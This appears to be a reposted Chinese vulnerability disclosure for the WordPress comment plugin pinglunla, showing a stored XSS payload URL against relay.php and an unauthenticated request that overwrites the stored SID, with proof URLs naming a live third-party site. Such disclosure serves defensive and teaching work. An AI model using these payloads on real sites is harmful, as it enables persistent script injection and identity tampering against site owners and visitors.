来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 1.xss/wp-content/plugins/pinglunla/relay.php?sid=ec51555f3e5e125257457a73609bdbe15cb7c29d/scriptscriptalert(0)/scriptscript%20src=以上URL 用于篡改评论啦的SID, 同时注入任意脚本, 脚本会......
1.xss
/wp-content/plugins/pinglunla/relay.php?sid=ec51555f3e5e125257457a73609bdbe15cb7c29d"></script><script>alert(0)</script><script%20src=" 以上URL 用于篡改评论啦的SID, 同时注入任意脚本, 脚本会被永久保存, 影响所有开启评论功能的页面. 漏洞证明:http://www.alibuybuy.com/wp-content/plugins/pinglunla/relay.php?sid=ec51555f3e5e125257457a73609bdbe15cb7c29d"></script><script>alert(0)</script><script%20src=" 2. 通过一个精心构造的URL, 可以任意篡改储存在数据库的SID 值. SID 是评论啦用于识别用户身份的标识. 详细说明: www.2cto.com /wp-content/plugins/pinglunla/relay.php?sid=new sid here 以上URL是用来接收PINGLUNLA服务器的回调, 参数sid会被值"new sid here"替换保存至数据库, 因为没有做任何认证, 匿名用户可以任意调用该接口进而篡改sid. 漏洞证明: http://www.alibuybuy.com/wp-content/plugins/pinglunla/relay.php?sid=new sid here 修复方案: 除了等待官方修复, 或可临时修改你的文件夹名称, 如wp-content, plinglunla, 以免被猜解. 作者 markstip |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com